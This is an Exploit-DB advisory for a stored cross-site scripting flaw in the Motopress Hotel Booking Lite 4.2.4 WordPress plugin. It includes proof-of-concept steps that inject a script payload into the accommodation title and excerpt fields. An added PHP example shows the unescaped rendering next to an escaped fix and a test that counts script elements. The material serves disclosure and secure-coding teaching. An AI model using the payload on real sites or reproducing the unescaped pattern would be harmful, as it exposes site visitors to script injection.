WordPress Plugin Motopress Hotel Booking Lite 4.2.4 – Stored Cross-Site Scripting (XSS)

  • Author: Sanjay Singh
    Date: 2022-06-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50951/
  • # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
    # Date: 2022-06-05
    # Exploit Author: Sanjay Singh
    # Vendor Homepage: https://motopress.com/
    # Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
    # Version: 4.2.4
    # Tested on: Windows/XAMPP
    ###########################################################################
    PoC:
    
    1. Open http://localhost/wp-admin/edit.php?post_type=mphb_room_type
    2. Click on "Add Accommodation Type".
    3. Enter the title payload: "><script>alert("XSS")</script>
    4. Enter the excerpt payload: "><script>alert("XSS")</script>
    5. Click publish.
    6. Visit http://localhost/accommodations/
    7. The XSS payload executes.
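
The steps above succeed when the stored title and excerpt reach the listing page without output escaping. The following is an added example, not the plugin's code or the exploit author's: it puts that pattern next to an escaped version in plain PHP and counts the script elements a parser finds in each. The names `render_card_unsafe`, `render_card_safe`, `e`, `script_elements` and the card markup are hypothetical.

```php
<?php
// Added example. The functions below are hypothetical stand-ins for a
// template that lists accommodation types; they are not the plugin's code.

// Constructed sample record holding the title and excerpt values from the PoC.
$room = [
    'title'   => '"><script>alert("XSS")</script>',
    'excerpt' => '"><script>alert("XSS")</script>',
];

// Vulnerable pattern: stored values are concatenated into markup as-is,
// in both a quoted-attribute context and an element-text context.
function render_card_unsafe(array $room): string
{
    return '<a class="room" title="' . $room['title'] . '">'
         . '<h2>' . $room['title'] . '</h2>'
         . '<p>' . $room['excerpt'] . '</p></a>';
}

// Escape at output time. ENT_QUOTES covers both quote styles, so the value
// cannot close the attribute. In WordPress templates, esc_attr() and
// esc_html() fill this role.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_card_safe(array $room): string
{
    return '<a class="room" title="' . e($room['title']) . '">'
         . '<h2>' . e($room['title']) . '</h2>'
         . '<p>' . e($room['excerpt']) . '</p></a>';
}

// Regression check: parse the markup and count real <script> elements.
function script_elements(string $html): int
{
    libxml_use_internal_errors(true); // tolerate the malformed unsafe markup
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    return $doc->getElementsByTagName('script')->length;
}

printf("unsafe: %d script element(s)\n", script_elements(render_card_unsafe($room)));
printf("safe:   %d script element(s)\n", script_elements(render_card_safe($room)));
```

Run it with the PHP CLI (the DOM extension is required); a check of this kind can sit in a theme or plugin test suite so that an unescaped field is caught before release.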